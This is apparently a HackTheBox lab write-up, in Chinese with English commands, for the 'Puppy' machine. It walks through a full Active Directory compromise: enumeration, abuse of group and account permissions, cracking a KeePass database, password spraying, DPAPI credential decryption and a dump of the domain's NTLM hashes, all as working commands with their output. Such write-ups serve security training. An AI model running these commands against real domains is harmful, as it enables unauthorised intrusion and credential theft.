Puppy - HackTheBox

基本信息

• https://app.hackthebox.com/machines/Puppy
• 10.10.11.70

As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

端口扫描

没有web端口，常规windows域端口：

$ nmap -sC -sV -Pn 10.10.11.70
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-22 14:38 JST
Nmap scan report for 10.10.11.70
Host is up (0.18s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-22 12:19:03Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3260/tcp open  iscsi?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-05-22T12:20:56
|_  start_date: N/A
|_clock-skew: 6h39m03s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.71 seconds

SMB

使用给出的账号密码查看smb share，能看到有个DEV，但没有权限：

python3 examples/smbclient.py levi.james:'KingofAkron2025!'@10.10.11.70

BloodHound

添加hosts后，常规bloodhound：

10.10.11.70 dc.puppy.htb puppy.htb

bloodhound-python -u levi.james -p 'KingofAkron2025!' -d 'puppy.htb' -ns 10.10.11.70 --zip -c All -dc 'dc.puppy.htb'

可以看到很明显的起始路径，levi.james属于HR组，对developers组有GenericWrite权限，那就可以添加自己到developers组，然后可以去查看前面的DEV share：

levi.james to ant.edwards

DEV

首先把自己添加到developers组中：

bloodyAD --host 10.10.11.70 -d puppy.htb -u 'levi.james' -p 'KingofAkron2025!' add groupMember 'DEVELOPERS' 'levi.james'

然后再去查看DEV，发现一个kdbx文件，下载下来：

keepass

常规破解，注意版本问题：

• recovery.kdbx : File version ‘40000’ is currently not supported! · Issue #5775 · openwall/john
  https://github.com/openwall/john/issues/5775
• r3nt0n/keepass4brute: Bruteforce Keepass databases (KDBX 4.x format)
  https://github.com/r3nt0n/keepass4brute

./keepass4brute.sh ../recovery.kdbx /usr/share/wordlists/rockyou.txt

[*] Password found: liverpool

之后就是打开kdbx文件，获取其中存储的密码：

JAMIE WILLIAMSON : JamieLove2025!
ADAM SILVER : HJKL2025!
ANTONY C. EDWARDS : Antman2025!
STEVE TUCKER : Steve2025!
SAMUEL BLAKE : ILY2025!

ant.edwards

使用bloodhound整理的用户名和这些密码字典，发现有效的ant.edwards

nxc smb 10.10.11.70 -u users.txt -p pass.txt

SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\ant.edwards:Antman2025!

ant.edwards to adam.silver

ant.edwards属于senior devs组，对adam.silver有GenericAll权限

但adam.silver是被禁用状态，所以需要先启用：

bloodyAD --host 10.10.11.70 -d puppy.htb -u ant.edwards -p 'Antman2025!' remove uac 'ADAM.SILVER' -f ACCOUNTDISABLE

之后就可以简单的直接修改密码：

bloodyAD --host 10.10.11.70 -d puppy.htb -u ant.edwards -p 'Antman2025!' --dc 10.10.11.70 set password "adam.silver" 'Passw@rd'

user flag

修改密码后登录adam.silver，桌面得到user flag:

evil-winrm -i 10.10.11.70 -u 'adam.silver' -p 'Passw@rd'

backups

C盘根目录有个backups目录,里面有个压缩包，下载下来查看：

里面的配置文件备份中得到steph.cooper账号密码：

steph.cooper
ChefSteph2025!

steph.cooper

账号密码有效可以登录，另外注意到steph.cooper还有个ADM账号：

evil-winrm -i 10.10.11.70 -u steph.cooper -p 'ChefSteph2025!'

所以就是常规dpapi，同一个用户两个账号，保存了密码

dpapi

下载相关文件到本地解密：

C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9
C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407


python3 examples/dpapi.py masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'

Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

python3 examples/dpapi.py credential -file "C8D69EBE9A43E9DEBF6B5FBD48B521B9" -key "0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84"

Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!

root flag

得到的就是admin权限用户：

evil-winrm -i 10.10.11.70 -u steph.cooper_adm -p 'FivethChipOnItsWay2025!'

hashdump

python3 examples/secretsdump.py steph.cooper_adm:'FivethChipOnItsWay2025!'@10.10.11.70 -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8:::
PUPPY.HTB\ant.edwards:1104:aad3b435b51404eeaad3b435b51404ee:afac881b79a524c8e99d2b34f438058b:::
PUPPY.HTB\adam.silver:1105:aad3b435b51404eeaad3b435b51404ee:a7d7c07487ba2a4b32fb1d0953812d66:::
PUPPY.HTB\jamie.williams:1106:aad3b435b51404eeaad3b435b51404ee:bd0b8a08abd5a98a213fc8e3c7fca780:::
PUPPY.HTB\steph.cooper:1107:aad3b435b51404eeaad3b435b51404ee:b261b5f931285ce8ea01a8613f09200b:::
PUPPY.HTB\steph.cooper_adm:1111:aad3b435b51404eeaad3b435b51404ee:ccb206409049bc53502039b80f3f1173:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::

参考资料

• recovery.kdbx : File version ‘40000’ is currently not supported! · Issue #5775 · openwall/john
  https://github.com/openwall/john/issues/5775
• r3nt0n/keepass4brute: Bruteforce Keepass databases (KDBX 4.x format)
  https://github.com/r3nt0n/keepass4brute